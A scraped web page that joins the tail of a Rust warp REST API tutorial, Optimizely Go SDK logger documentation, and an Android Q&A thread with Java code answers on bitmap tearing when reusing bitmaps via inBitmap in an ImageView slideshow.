How did I know how to do it? I just followed the documentation where it says "How can I implement Eq?". Yes, Rust docs are that good.
And what about Hash? Same thing. But it is interesting to note why I did it. HashSet requires the Hash trait, and the Hash trait demands this:
k1 == k2 -> hash(k1) == hash(k2)
That means, if the values you're comparing are equal, their hashes also have to be equal, which would not hold after the implementation of
PartialEq and
Eq because both values were being hashed and compared, while the direct comparison only cared about
id.
99% chance that I am wrong, but I think it should not be an implication (→), but a biconditional (↔), because the way it stands if
k1 == k2is false and
hash(k1) == hash(k2)is true, the implication's result is still true. But I am not a trained computer scientist and I am not sure this uses first-order logic notation. Let me know in the comments if you do.
One last addition I made below the Hash implementation was this:
pub fn get_simulation<'a>(sims: &'a HashSet<Simulation>, id: u64) -> Option<&'a Simulation>{ sims.get(&Simulation{ id, name: String::new(), }) }
Even though the only relevant field for comparisons is
id when using methods such as
get() we have to pass the entire struct, so I created
get_simulation() to replace it.
Ok, back to the
GET method.
Getting away with it
The functions dealing with the
GET method now have to deal with two additional information, the HashSet from where it will fetch the result and the parameter that might be used.
pub fn list_sims(db: models::Db) -> impl Filter<Extract = impl warp::Reply, Error = warp::Rejection> + Clone { let db_map = warp::any() .map(move || db.clone()); let opt = warp::path::param::<u64>() .map(Some) .or_else(|_| async { // Ok(None) Ok::<(Option<u64>,), std::convert::Infallible>((None,)) }); warp::path!("holodeck" / ..) .and(opt) .and(warp::path::end()) .and(db_map) .and_then(handlers::handle_list_sims) }
The
opt represents the optional parameter that can be sent. It gets a param, map it as an
Option (i.e.,
Some). If it was not provided, the
or_else() returns a
None. The reason why there's and
async there is because
or_else() returns a TryFuture.
The
path we are actually returning includes this
opt the same way we included the
db_bap. the
/ .. at the and of
path! is there to tell the macro to not add the
end() so I could add the
opt. That's why there's a manual
end() there soon after.
I didn't found this solution in the docs or in the examples. Actually, for some reason, most tutorials omit
GETparameters. They either just list everything or use query. I found one tutorial that implemented this, but they did so by creating two filters and two handlers. It didn't felt ok, and I knew there should be a solution and that the problem was probably my searching skills; so I asked for help in warp's discord channel, and the nice gentleman jxs pointed me to the solution you saw above.
The next step was to fix the handler:
pub async fn handle_list_sims(param: u64, db: models::Db) -> Result<impl warp::Reply, Infallible> { let mut result = db.lock().await.clone(); if param > 0 { result.retain(|k| k.id == param); }; Ok(warp::reply::json(&result)) }
It is no longer a Matthew McConaughey handler, but still very simple. I am using
retain instead of a
get_simulation() because it returns a HashSet (and get would give me a
models::Simulation), which is exactly what the handler must return.
$ cargo test running 3 tests test tests::try_create ... ok test tests::try_create_duplicates ... ok test tests::try_list ... ok test result: ok. 3 passed; 0 failed; 0 ignored; 0 measured; 0 filtered out
In the next episode of Engaging Warp...
We will finish the implementation by implementing the
PUT and
DELETE methods.
🖖
Discussion (0) | https://dev.to/rogertorres/rest-api-with-rust-warp-3-get-4nll | CC-MAIN-2022-27 | en | refinedweb |
Customize logger
The logger logs information about your experiments to help you with debugging. You can customize where log information is sent and what kind of information is tracked.
The default logger in the Go SDK logs to STDOUT. If you want to disable or customize the logger, you can provide an implementation of the OptimizelyLogConsumer interface.
Custom logger implementation in the SDK
import "github.com/optimizely/go-sdk/pkg/logging" type CustomLogger struct { } func (l *CustomLogger) Log(level logging.LogLevel, message string, fields map[string]interface{}) { } func (l *CustomLogger) SetLogLevel(level logging.LogLevel) { } customLogger := New(CustomLogger) logging.SetLogger(customLogger)
Setting the log level
You can also change the default log level from INFO to any of the other log levels.
import "github.com/optimizely/go-sdk/pkg/logging" // Set log level to Debug logging.SetLogLevel(logging.LogLevelDebug)
Log levels
The table below lists the log levels for the Go SDK.
Updated over 2 years ago
Did this page help you? | https://docs.developers.optimizely.com/full-stack/docs/customize-logger-go | CC-MAIN-2022-27 | en | refinedweb |
Hi,
I am trying to read single cells in excel using python. I am not interested in reading the entire sheet at once just one cell at a time.
Basically I want to be able to read say Cell A1, store it in a variable and B1 store it in a variable.
If both cells can be read at once and stored in variables that would be better.
Here is what my code looks like:
import xlrd
wb = xlrd.open_workbook("Table.xls")
sh1 = wb.sheet_by_index(0)
print "content of", sh1.name
for rownum in range(sh1.nrows):
print sh1.row_values(rownum)
this returns the entire sheet like this:
[u'GIS_ECA_ALT_AB_BF_ACCESS_A', u'TRN_ACCESS_ALT_A']
[u'GIS_ECA_ALT_AB_BF_ACCESS_L', u'TRN_ACCESS_ALT_L']
[u'GIS_ECA_ALT_AB_BF_AIR_WEAPONS_RANGE_A', u'AIR_WEAPONS_RANGE_ALT_A']
[u'GIS_ECA_ALT_AB_BF_ATS_A', u'GRD_ATS_ALT_A']
[u'GIS_ECA_ALT_AB_BF_ATS_L', u'GRD_ATS_ALT_L']
[u'GIS_ECA_ALT_AB_BF_CITY_A', u'ADM_CITY_ALT_A']
[u'GIS_ECA_ALT_AB_BF_CONTOUR_INDEX_L', u'GNG_CONTOUR_INDEX_ALT_L']
[u'GIS_ECA_ALT_AB_BF_CONTOUR_L', u'GNG_CONTOUR_ALT_L']
[u'GIS_ECA_ALT_AB_BF_CONTOUR_T', u'GNG_CONTOUR_ALT_T']
all I want to be able to do is save the first part of line 1 into a separate variable and do the same for the second part.
The rest of the rows in the spread sheet will be read using a loop.
Please note this is just a part of an entire syntax which takes the information from here and applies in other processes.
I hope I've given enough info. Any help is appreciated.
Thanks | http://forums.devshed.com/python-programming/921755-reading-single-cells-excel-using-python-last-post.html | CC-MAIN-2017-13 | en | refinedweb |
only commercial admins can setup branch privacy policies
Bug Description
Projects have a branch privacy policy that says whether branches are public or private by default and whether they can be public or private. (I think.) At the moment this can only be changed by losas. It would be better if there was a ui and api for allowing project owners to read this and change it. There are some business rules about who is entitled to set particular values.
This causes a lot of latency for new users and a fair amount of work for feedback@, commercial@ and losas, on which grounds Robert says this can probably be critical.
Related branches
- Curtis Hovey (community): Approve (code) on 2012-07-11
- Diff: 696 lines (+137/-287)6 files modifiedlib/lp/code/errors.py (+0/-10)
lib/lp/code/interfaces/branchnamespace.py (+6/-16)
lib/lp/code/model/branch.py (+6/-9)
lib/lp/code/model/branchnamespace.py (+52/-76)
lib/lp/code/model/tests/test_branch.py (+5/-6)
lib/lp/code/model/tests/test_branchnamespace.py (+68/-170)
- Ian Booth (community): Approve on 2012-07-12
- Diff: 189 lines (+61/-40)5 files modifiedlib/lp/code/browser/branchlisting.py (+25/-6)
lib/lp/code/browser/tests/test_product.py (+13/-7)
lib/lp/code/interfaces/branchnamespace.py (+4/-6)
lib/lp/code/model/branchnamespace.py (+5/-8)
lib/lp/code/templates/product-branches.pt (+14/-13)
- j.c.sackett (community): Approve on 2012-07-12
- Diff: 531 lines (+185/-228)5 files modifiedlib/lp/code/browser/branch.py (+50/-25)
lib/lp/code/browser/tests/test_branch.py (+80/-58)
lib/lp/code/interfaces/branch.py (+5/-17)
lib/lp/code/model/branch.py (+14/-32)
lib/lp/code/model/tests/test_branch.py (+36/-96)
- Robert Collins (community): Approve on 2012-07-16
- Stuart Bishop: Pending (db) requested 2012-07-13
- Diff: 15 lines (+11/-0)1 file modifieddatabase/schema/patch-2209-26-0.sql (+11/-0)
- Brad Crittenden (community): Approve (code) on 2012-07-13
- Diff: 563 lines (+315/-6)11 files modifiedlib/lp/code/model/branchnamespace.py (+64/-0)
lib/lp/code/model/tests/test_branchnamespace.py (+92/-3)
lib/lp/registry/browser/product.py (+6/-0)
lib/lp/registry/configure.zcml (+1/-1)
lib/lp/registry/enums.py (+61/-0)
lib/lp/registry/interfaces/product.py (+15/-0)
lib/lp/registry/interfaces/sharingservice.py (+7/-0)
lib/lp/registry/model/product.py (+9/-1)
lib/lp/registry/services/sharingservice.py (+19/-0)
lib/lp/registry/services/tests/test_sharingservice.py (+34/-1)
lib/lp/services/features/flags.py (+7/-0)
- William Grant: Approve (code) on 2012-08-22
- Diff: 473 lines (+27/-99)13 files modifiedlib/lp/bugs/browser/tests/test_bugs.py (+2/-6)
lib/lp/bugs/browser/tests/test_bugtarget_filebug.py (+4/-10)
lib/lp/bugs/mail/tests/test_handler.py (+2/-4)
lib/lp/bugs/tests/test_bugs_webservice.py (+1/-5)
lib/lp/code/browser/tests/test_branch.py (+4/-8)
lib/lp/code/browser/tests/test_branchlisting.py (+3/-3)
lib/lp/code/model/tests/test_branch.py (+4/-8)
lib/lp/code/model/tests/test_branchnamespace.py (+1/-4)
lib/lp/registry/model/product.py (+0/-8)
lib/lp/registry/tests/test_product.py (+1/-4)
lib/lp/registry/tests/test_product_webservice.py (+2/-32)
lib/lp/soyuz/tests/test_archive.py (+3/-4)
lib/lp/testing/sampledata.py (+0/-3)
I've suggested this be critical on the basis that:
- money is involved
- losas are flat out and we would like them to only be asked to do actually sensitive things.
On 5 April 2011 10:19, Robert Collins <email address hidden> wrote:
> I'm not sure that an API is helpful here, because the topic is complex
> and web pages are pretty good at explaining things.
I agree actually. We mostly need an api for making particular new or
existing branches private.
Downgrading to High as this isn't worthy of Critical escalation.
I believe disclosure will be removing branch access policies (or reframing them) and will probably fix this as a side effect.
Thank you for finding that bug jml. This bug is about team/user branch policies. bug 290655 is about changing branch visibility. Both bugs will be fixed in a few weeks.
r15610 in stable (http://
Fixed in stable r15613 <http://
Fixed in stable r15617 <http://
Fixed in db-stable r11767 (http://
r15629 in stable (http://
Both BVP- and b_s_p-based sharing work fine on qastaging.
From what I have seen, using qastaging, setBranchSharin
Right, the plan is to remove the commercial-admin guards and open it up to anyone with launchpad.Edit. Probably once the code is done and we're ready to enter beta.
Fixed in stable r15846 <http://
I'm not sure that an API is helpful here, because the topic is complex and web pages are pretty good at explaining things. | https://bugs.launchpad.net/launchpad/+bug/750871 | CC-MAIN-2017-13 | en | refinedweb |
Hello,
The latest version on maven repo is 3.0.0-rc2
Could you fix please
thanks
Hermann
Type: Posts; User: hermann.rangamana
Hello,
The latest version on maven repo is 3.0.0-rc2
Could you fix please
thanks
Hermann
Hello,
I think Component class would benefit for implementing HasEnabled interface (there'd be no API change, since Component already has setEnabled(boolean)/isEnabled). The benefit is that when i...
Hi Colin,
I'm not sure you understand my issue. Let me explain it in a simple example.
Consider you write an application that archives stock data (last quote, and change in % comparing to the...
Hi there,
I have a simple grid, with some editable columns. Autocommit is false. When i edit the column, i call a rpc which validate the data and then respond with a full object (that is,...
Thanks for your reply.
HR
Hi Colin,
Both names (repo1.maven.org and repo.maven.apache.org) direct me to 89.167.251.252.
HR
Thanks for your prompt reply!
Using the ip address, i can see the 3.0.0-rc version (@ ), so i guess it's a sync problem on some of their servers. I...
Absolutely sure.
I tried to get those file using my corporate access network or my home internet access, both fails. And when i try to list the content of the directory...
Guys,
NPE occurs in com.sencha.gxt.data.shared.Store.java, at line 126 (method isCurrentValue(M model))
public boolean isCurrentValue(M model) {
return (access.getValue(model) ==...
I encounter the same problem when building with maven using RC
From my pom.xml
<dependency>
<groupId>com.sencha.gxt</groupId>
<artifactId>gxt</artifactId>
...
Hello,
I am on GWT 3 beta 3.
I created a BorderLayoutContainer with collapsible panel on the west side. Here is the code snippet
westPanel = new ContentPanel();
centerPanel...
Thanks for your reply, steven.
Hermann
Thanks for your reply.
But what if i want my container to fill the whole browser window ? I'd expected the same behavior as straight gwt panels which automatically fill the window browser when i...
On gxt 3.0.0 beta 2, i have an simple CenterLayoutContainer with a single panel inside it (a copy-paste from the showcase actually). But i was surprised, the content of my container is not centered,... | https://www.sencha.com/forum/search.php?s=ffb684085386d14f88446fc4e98c53a4&searchid=19067317 | CC-MAIN-2017-13 | en | refinedweb |
1. Use non-opaque Color instances. Apple even supports setting a non-opaque background Color, but you need all the components in your UI to behave, and that really makes this awkward. And slow. This may be the method of the future, but at the moment, not enough pieces are there for it to work.
2. Use undocumented/unsupported Java methods. The beauty of this is that it's easy. The trouble with this is that it's not really what you want. Start GNOME Terminal, for example, and drag the transparency slider in the preferences dialog. (You need to be running Compiz.) You'll notice that although the terminal's transparency changes, the window decorations supplied by the system and the menu bar and scroll bar supplied by the application all keep the default fully-opaque level of transparency. (More subtly than that, you'll notice that it's really just the default background that's transparent. Anything rendered on top of that is rendered normally.)
3. Native code. This is currently your only choice on MS Windows. I've never explored this because I don't care enough about transparency (or Windows) to go to the trouble.
4. Swing Hacks's embarrassing copy-the-background trick. I sometimes think that book was on a secret mission to make Java look bad. (Then again, when GNOME Terminal switched to real transparency from a similarly ugly hack, some people complained because they could no longer see XEarth through the whole window stack; they were using "transparent" terminals specifically because they wanted to see the root window. It takes all sorts.)
Here, I'm talking about method 2 for X11 (Linux and Solaris). The Mac OS equivalent is well-known, and can be found every so often on Apple's java-dev mailing list, or around the web if you search for "CWindow.setAlpha". I've yet to see the X11 equivalent, though, so that's what I'm going to show you today.
The code's really just these two lines:
long windowId = peer.getWindow();
sun.awt.X11.XAtom.get("_NET_WM_WINDOW_OPACITY").setCard32Property(windowId, value);
Things are made more complicated by the fact that Component's peer field is only accessible within its package (or via a deprecated method), and XAtom isn't necessarily available on all platforms, and will win you a warning even on Sun's Unix JDK. So it's the usual reflection dance:
import java.awt.*;
import java.lang.reflect.*;
import javax.swing.*;
import javax.swing.event.*;
public class TransparencyTest extends JFrame implements ChangeListener {
private JSlider slider;
public TransparencyTest() {
super("Transparency Test");
setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
slider = new JSlider(0, 255);
slider.setValue(255);
slider.addChangeListener(this);
JPanel panel = new JPanel(new BorderLayout());
panel.add(slider, BorderLayout.CENTER);
setContentPane(panel);
setSize(new Dimension(640, 480));
setLocationRelativeTo(null);
}
public void stateChanged(ChangeEvent e) {
double value = ((double) slider.getValue())/((double) slider.getMaximum());
setWindowOpacity(this, value);
}
public void setWindowOpacity(Frame frame, double opacity) {
long value = (int) (0xff * opacity) << 24;
try {
// long windowId = peer.getWindow();
Field peerField = Component.class.getDeclaredField("peer");
peerField.setAccessible(true);
Class<?> xWindowPeerClass = Class.forName("sun.awt.X11.XWindowPeer");
Method getWindowMethod = xWindowPeerClass.getMethod("getWindow", new Class[0]);
long windowId = ((Long) getWindowMethod.invoke(peerField.get(frame), new Object[0])).longValue();
// sun.awt.X11.XAtom.get("_NET_WM_WINDOW_OPACITY").setCard32Property(windowId, value);
Class<?> xAtomClass = Class.forName("sun.awt.X11.XAtom");
Method getMethod = xAtomClass.getMethod("get", String.class);
Method setCard32PropertyMethod = xAtomClass.getMethod("setCard32Property", long.class, long.class);
setCard32PropertyMethod.invoke(getMethod.invoke(null, "_NET_WM_WINDOW_OPACITY"), windowId, value);
} catch (Exception ex) {
// Boo hoo! No transparency for you!
ex.printStackTrace();
return;
}
}
public static void main(String[] args) {
new TransparencyTest().setVisible(true);
}
}
I'm not sure how useful this is, but at least you can no longer complain you weren't aware you had the option.
There are cases where you might actually want this kind of transparency, the sole example amongst things I've written was an application that monitored what iTunes was playing and, whenever it changed, faded in a transparent output-only window containing huge text telling me what I was now listening to.
Such uses, though, are probably few and far between. | http://elliotth.blogspot.com/2007/08/transparent-java-windows-on-x11.html | CC-MAIN-2017-13 | en | refinedweb |
Created on 2016-01-27 17:25 by ikelly, last changed 2016-03-02 16:04 by yselivanov. This issue is now closed.
I was playing around with this class for adapting regular iterators to async iterators using BaseEventLoop.run_in_executor:
import asyncio
class AsyncIteratorWrapper:
def __init__(self, iterable, loop=None, executor=None):
self._iterator = iter(iterable)
self._loop = loop or asyncio.get_event_loop()
self._executor = executor
async def __aiter__(self):
return self
async def __anext__(self):
try:
return await self._loop.run_in_executor(
self._executor, next, self._iterator)
except StopIteration:
raise StopAsyncIteration
Unfortunately this fails because when next raises StopIteration, run_in_executor swallows the exception and just returns None back to the coroutine, resulting in an infinite iterator of Nones.
What are you trying to do here? Can you post a simple example of an iterator that you would like to use with this? Without that it just raises my hackles -- it seems totally wrong to run an iterator in another thread. (Or is the iterator really a coroutine/future?)
The idea is that the wrapped iterator is something potentially blocking, like a database cursor that doesn't natively support asyncio. Usage would be something like this:
async def get_data():
cursor.execute('select * from stuff')
async for row in AsyncIteratorWrapper(cursor):
process(row)
Investigating this further, I think the problem is actually in await, not run_in_executor:
>>> async def test():
... fut = asyncio.Future()
... fut.set_exception(StopIteration())
... print(await fut)
...
>>> loop.run_until_complete(test())
None
Stop.
Fair enough. I think there should be some documentation though to the effect that coroutines aren't robust to passing StopIteration across coroutine boundaries. It's particularly surprising with PEP-492 coroutines, since those aren't even iterators and intuitively should ignore StopIteration like normal functions do.
As it happens, this variation (moving the try-except into the executor thread) does turn out to work but is probably best avoided for the same reason. I don't think it's obviously bad code though:
class AsyncIteratorWrapper:
def __init__(self, iterable, loop=None, executor=None):
self._iterator = iter(iterable)
self._loop = loop or asyncio.get_event_loop()
self._executor = executor
async def __aiter__(self):
return self
async def __anext__(self):
def _next(iterator):
try:
return next(iterator)
except StopIteration:
raise StopAsyncIteration
return await self._loop.run_in_executor(
self._executor, _next, self._iterator)
Can you suggest a sentence to insert into the docs and a place where
to insert it? (As you can imagine I'm pretty blind for such issues
myself.)
The."
Chris Angelico suggested on python-list that another possibly useful thing to do would be to add a "from __future__ import generator_stop" to asyncio/futures.py. This would at least have the effect of causing "await future" to raise a RuntimeError instead of silently returning None if a StopIteration is set on the future. Future.__iter__ is the only generator in the file, so this change shouldn't have any other effects.
Chris, can you help out here? I still don't understand the issue here. Since "from __future__ import generator_stop" only works in 3.5+ it would not work in Python 3.3/3.4 (supported by upstream asyncio with literally the same source code currently). If there's no use case for f.set_exception(StopIteration) maybe we should just complain about that?
Ultimately,"?
OK, since eventually there won't be a way to inject StopIteration into
a Future anyway (it'll always raise RuntimeError once PEP 479 is the
default behavior) we should just reject this in set_exception().
POC patch, no tests. Is TypeError right? Should it be ValueError, since the notional type is "Exception"?
I think TypeError is fine. I would make the message a bit longer to
explain carefully what's the matter.
How about "StopException interacts badly with generators and cannot be raised into a Future"?
S.G.T.M.
On Sunday, February 21, 2016, Chris Angelico <report@bugs.python.org> wrote:
>
> Chris Angelico added the comment:
>
> How about "StopException interacts badly with generators and cannot be
> raised into a Future"?
>
> ----------
>
> _______________________________________
> Python tracker <report@bugs.python.org <javascript:;>>
> <>
> _______________________________________
>
Wording changed, and a simple test added. I'm currently seeing failures in test_site, but that probably means I've messed something up on my system.
Would you mind reworking this as a PR for github.com/python/asyncio ?
That's still considered "upstream" for asyncio.
--Guido
On Sun, Feb 21, 2016 at 8:17 AM, Chris Angelico <report@bugs.python.org> wrote:
>
> Chris Angelico added the comment:
>
> Wording changed, and a simple test added. I'm currently seeing failures in test_site, but that probably means I've messed something up on my system.
>
> ----------
> Added file:
>
> _______________________________________
> Python tracker <report@bugs.python.org>
> <>
> _______________________________________
Opened
New changeset ef5265bc07bb by Yury Selivanov in branch '3.5':
asyncio: Prevent StopIteration from being thrown into a Future
New changeset 5e2f7e51af51 by Yury Selivanov in branch 'default':
Merge 3.5 (issue #26221)
Merged. | https://bugs.python.org/issue26221 | CC-MAIN-2017-13 | en | refinedweb |
It seems like my old thread had died because the people helping me are now offline and no one else is repsponding so I am just gonna start this new post.
This is an assigment I recieved for one of my classes:".
So far this is what I have written:
At this point I am attempting to convert the characters to integers. When I cout<Num1 [Length - 1] I get some trash number and not the actual number. Am I converting things correctly?At this point I am attempting to convert the characters to integers. When I cout<Num1 [Length - 1] I get some trash number and not the actual number. Am I converting things correctly?Code:include <iostream> using namespace std; const int Size = 20; int main () { char FirstNumber [Size]; char SecondNumber [Size]; int Length; int Length2; int Num1 [Size]; int Num2 [Size]; cout<<"Enter the First Number : "; cin>>FirstNumber; cout<<"Enter the Second Number : "; cin>>SecondNumber; Length = strlen (FirstNumber); Length2 = strlen (SecondNumber); Num1 [Length] = FirstNumber [Size] - '0'; Num2 [Length2] = SecondNumber [Size] - '0'; cout<<Num1 [Length - 1]; return 0; } | https://cboard.cprogramming.com/cplusplus-programming/88121-converting-character-array-integer-array.html | CC-MAIN-2017-13 | en | refinedweb |
WPF implements UI Virtualization via VirtualizingStackPanel and it works great, but situation with Data Virtualization is a bit more complex.
After doing some experimentation I realized that VirtualizingStackPanel when used with WPF TreeView does not allow the data to be virtualized because it iterates through all the collection of data items from inside its MeasureOverride function. However, it access only visible data items when used with DataGrid or ListView, so it allows to use some paging or caching techniques in this case. See the following articles for more information:
- WPF: Data Virtualization – some simple example that uses paging technique.
- UI Virtualization vs. Data Virtualization (Part 1) – interesting sample that uses Dispatcher for deferred loading.
If you interested on what I tried to do with TreeView, please read below.
I replaced VirtualizingStackPanel with Dan Crevier’s VirtualizingTilePanel by overriding TreeViewItem’s PrepareContainerForItemOverride method:
public class AsyncTreeViewItem : TreeViewItem { protected override DependencyObject GetContainerForItemOverride() { return new AsyncTreeViewItem(); } protected override bool IsItemItsOwnContainerOverride(object item) { return item is AsyncTreeViewItem; } protected override void PrepareContainerForItemOverride(DependencyObject element, object item) { AsyncTreeViewItem tree_view_item = element as AsyncTreeViewItem; if (item is Model.CategoryView) { FrameworkElementFactory factoryPanel = new FrameworkElementFactory(typeof(Controls.VirtualizingTilePanel)); ItemsPanelTemplate template = new ItemsPanelTemplate(); template.VisualTree = factoryPanel; tree_view_item.ItemsPanel = template; } base.PrepareContainerForItemOverride(element, item); } }
After playing a bit with VirtualizingTilePanel’s code I made my TreeView work somehow, but it did not scroll correctly and hanged up sometimes. So I think that theoretically, it is possible to use some very smart Panel instead of VirtualizingStackPanel, but in practice it is not a trivial task
| https://developernote.com/2013/01/wpf-treeview-does-not-support-data-virtualization/ | CC-MAIN-2018-30 | en | refinedweb |
Hypothesis will speed up your testing process and improve your software quality, but when first starting out people often struggle to figure out exactly how to use it.
Until you’re used to thinking in this style of testing, it’s not always obvious what the invariants of your code actually are, and people get stuck trying to come up with interesting ones to test.
Fortunately, there’s a simple invariant which every piece of software should satisfy, and which can be remarkably powerful as a way to uncover surprisingly deep bugs in your software.
That invariant is simple: The software shouldn’t crash. Or sometimes, it should only crash in defined ways.
There is then a standard test you can write for most of your code that asserts this invariant.
It consists of two steps:
- Pick a function in your code base that you want to be better tested.
- Call it with random data.
This style of testing is usually called fuzzing.
This will possibly require you to figure out how to generate your domain objects. Hypothesis has a pretty extensive library of tools (called ‘strategies’ in Hypothesis terminology).
You’ll probably get exceptions here you don’t care about. e.g. some arguments to functions may not be valid. Set up your test to ignore those.
So at this point you’ll have something like this:
from hypothesis import given, reject from hypothesis.strategies import integers, text @given(integers(), text()) def test_some_stuff(x, y): try: my_function(x, y) except SomeExpectedException: reject()
In this example we generate two values - one integer, one text - and pass them to your test function. Hypothesis will repeatedly call the test function with values drawn from these strategies, trying to find one that produces an unexpected exception.
When an exception we know is possible happens (e.g. a ValueError because some argument was out of range) we call reject. This discards the example, and Hypothesis won’t count it towards the ‘budget’ of examples it is allowed to run.. John Regehr has a good post on this subject if you want to know more about it..
Once you think you’ve got the hang of this, a good next step is to start looking for places with complex optimizations or Encode/Decode pairs in your code, as they’re a fairly easy properties to test and are both rich sources of bugs.
And, of course, if you’re still having trouble getting started with Hypothesis, the other easy way is to persuade your company to hire us for a training course. Drop us an email at [email protected] | https://hypothesis.works/articles/getting-started-with-hypothesis/ | CC-MAIN-2018-30 | en | refinedweb |
BitmapFactory.Options.inBitmap causes tearing when switching ImageView bitmap often
I’ve encountered a situation where I have to display images in a slideshow that switches image very fast. The sheer number of images makes me want to store the JPEG data in memory and decode them when I want to display them. To ease on the Garbage Collector, I’m using BitmapFactory.Options.inBitmap to reuse bitmaps.
Unfortunately, this causes rather severe tearing, I’ve tried different solutions such as synchronization, semaphores, alternating between 2-3 bitmaps, however, none seem to fix the problem.
I’ve set up an example project which demonstrates this issue over at GitHub;
I’ve got a thread which decodes the bitmap, sets it on the UI thread, and sleeps for 5 ms:
Runnable runnable = new Runnable() { @Override public void run() { while(true) { BitmapFactory.Options options = new BitmapFactory.Options(); options.inSampleSize = 1; if(bitmap != null) { options.inBitmap = bitmap; } bitmap = BitmapFactory.decodeResource(getResources(), images.get(position), options); runOnUiThread(new Runnable() { @Override public void run() { imageView.setImageBitmap(bitmap); } }); try { Thread.sleep(5); } catch (InterruptedException e) {} position++; if(position >= images.size()) position = 0; } } }; Thread t = new Thread(runnable); t.start();
My idea is that ImageView.setImageBitmap(Bitmap) draws the bitmap on the next vsync, however, we’re probably already decoding the next bitmap when this happens, and as such, we’ve started modifying the bitmap pixels. Am I thinking in the right direction?
Has anyone got any tips on where to go from here?
Related posts:
5 Solutions collect form web for “BitmapFactory.Options.inBitmap causes tearing when switching ImageView bitmap often”
As an alternative to your current approach, you might consider keeping the JPEG data as you are doing, but also creating a separate Bitmap for each of your images, and using the
inPurgeable and
inInputShareable flags. These flags allocate the backing memory for your bitmaps on a separate heap that is not directly managed by the Java garbage collector, and allow Android itself to discard the bitmap data when it has no room for it and re-decode your JPEGs on demand when required. Android has all this special-purpose code to manage bitmap data, so why not use it?
You should use the onDraw() method of the ImageView since that method is called when the view needs to draw its content on screen.
I create a new class named MyImageView which extends the ImageView and override the onDraw() method which will trigger a callback to let the listener knows that this view has finished its drawing
public class MyImageView extends ImageView { private OnDrawFinishedListener mDrawFinishedListener; public MyImageView(Context context, AttributeSet attrs) { super(context, attrs); } @Override protected void onDraw(Canvas canvas) { super.onDraw(canvas); if (mDrawFinishedListener != null) { mDrawFinishedListener.onOnDrawFinish(); } } public void setOnDrawFinishedListener(OnDrawFinishedListener listener) { mDrawFinishedListener = listener; } public interface OnDrawFinishedListener { public void onOnDrawFinish(); } }
In the MainActivity, define 3 bitmaps: one reference to the bitmap which is being used by the ImageView to draw, one for decoding and one reference to the bitmap that is recycled for the next decoding. I reuse the synchronized block from vminorov’s answer, but put in different places with explanation in the code comment
public class MainActivity extends Activity { private Bitmap mDecodingBitmap; private Bitmap mShowingBitmap; private Bitmap mRecycledBitmap; private final Object lock = new Object(); private volatile boolean ready = true; ArrayList<Integer> images = new ArrayList<Integer>(); int position = 0; MyImageView imageView = (MyImageView) findViewById(R.id.image); imageView.setOnDrawFinishedListener(new OnDrawFinishedListener() { @Override public void onOnDrawFinish() { /* * The ImageView has finished its drawing, now we can recycle * the bitmap and use the new one for the next drawing */ mRecycledBitmap = mShowingBitmap; mShowingBitmap = null; synchronized (lock) { ready = true; lock.notifyAll(); } } }); final Button goButton = (Button) findViewById(R.id.button); goButton.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { Runnable runnable = new Runnable() { @Override public void run() { while (true) { BitmapFactory.Options options = new BitmapFactory.Options(); options.inSampleSize = 1; if (mDecodingBitmap != null) { options.inBitmap = mDecodingBitmap; } mDecodingBitmap = BitmapFactory.decodeResource( getResources(), images.get(position), options); /* * If you want the images display in order and none * of them is bypassed then you should stay here and * wait until the ImageView finishes displaying the * last bitmap, if not, remove synchronized block. * * It's better if we put the lock here (after the * decoding is done) so that the image is ready to * pass to the ImageView when this thread resume. */ synchronized (lock) { while (!ready) { try { lock.wait(); } catch (InterruptedException e) { e.printStackTrace(); } } ready = false; } if (mShowingBitmap == null) { mShowingBitmap = mDecodingBitmap; mDecodingBitmap = mRecycledBitmap; } runOnUiThread(new Runnable() { @Override public void run() { if (mShowingBitmap != null) { imageView .setImageBitmap(mShowingBitmap); /* * At this point, nothing has been drawn * yet, only passing the data to the * ImageView and trigger the view to * invalidate */ } } }); try { Thread.sleep(5); } catch (InterruptedException e) { } position++; if (position >= images.size()) position = 0; } } }; Thread t = new Thread(runnable); t.start(); } }); } }
You need to do the following things in order to get rid of this problem.
- Add an extra bitmap to prevent situations when ui thread draws a bitmap while another thread is modifying it.
- Implement threads synchronization to prevent situations when background thread tries to decode a new bitmap, but the previous one wasn’t shown by the ui thread.
I’ve modified your code a bit and now it works fine for me.
package com.example.TearingExample; import android.app.Activity; import android.graphics.Bitmap; import android.graphics.BitmapFactory; import android.os.Bundle; import android.view.View; import android.widget.Button; import android.widget.ImageView; import java.util.ArrayList; public class MainActivity extends Activity { ArrayList<Integer> images = new ArrayList<Integer>(); private Bitmap[] buffers = new Bitmap[2]; private volatile Bitmap current; private final Object lock = new Object(); private volatile boolean ready = true; ImageView imageView = (ImageView) findViewById(R.id.image); final Button goButton = (Button) findViewById(R.id.button); goButton.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { Runnable runnable = new Runnable() { @Override public void run() { int position = 0; int index = 0; while (true) { try { synchronized (lock) { while (!ready) { lock.wait(); } ready = false; } BitmapFactory.Options options = new BitmapFactory.Options(); options.inSampleSize = 1; options.inBitmap = buffers[index]; buffers[index] = BitmapFactory.decodeResource(getResources(), images.get(position), options); current = buffers[index]; runOnUiThread(new Runnable() { @Override public void run() { imageView.setImageBitmap(current); synchronized (lock) { ready = true; lock.notifyAll(); } } }); position = (position + 1) % images.size(); index = (index + 1) % buffers.length; Thread.sleep(5); } catch (InterruptedException ignore) { } } } }; Thread t = new Thread(runnable); t.start(); } }); } }
In the BM.decode(resource…
is the network involved?
If yes then u need to optimize the look-ahead connection and data transport across the net connection as well as your work optimizing bitmaps and memory.That can mean becoming adept at low latency or async transport using your connect protocol (http i guess). Make sure that you dont transport more data than you need? Bitmap decode can often discard 80% of the pixels in creating an optimized object to fill a local view.
If the data intended for the bitmaps are already local and there are not concerns about network latency then just focus on reserving a collection type DStructure(listArray) to hold the fragments that the UI will swap on the page-forward, page-back events.
If your jpegs ( pngs are lossless with bitmap ops IMO ) are around 100k each you can just use a std adapter to load them to fragments. If they are alot larger , then you will have to figure out the bitmap ‘compress’ option to use with the decode in order not to waste alot of memory on your fragment data structure.
if you need a theadpool in order to optimize the bitmap creation, then do that to remove any latency involved at that step.
Im not sure that it works, but if you want to get more complicated, you could look at putting a circular buffer or something underneath the listArray that collaborates with the adapter??
IMO – once you have the structure, the transaction switching among fragments as you page should be very fast. I have direct experience with about 6 pics in memory each with size around 200k and its fast at the page-fwd, page-back.
I used this app as a framework , focusing on the ‘page-viewer’ example.
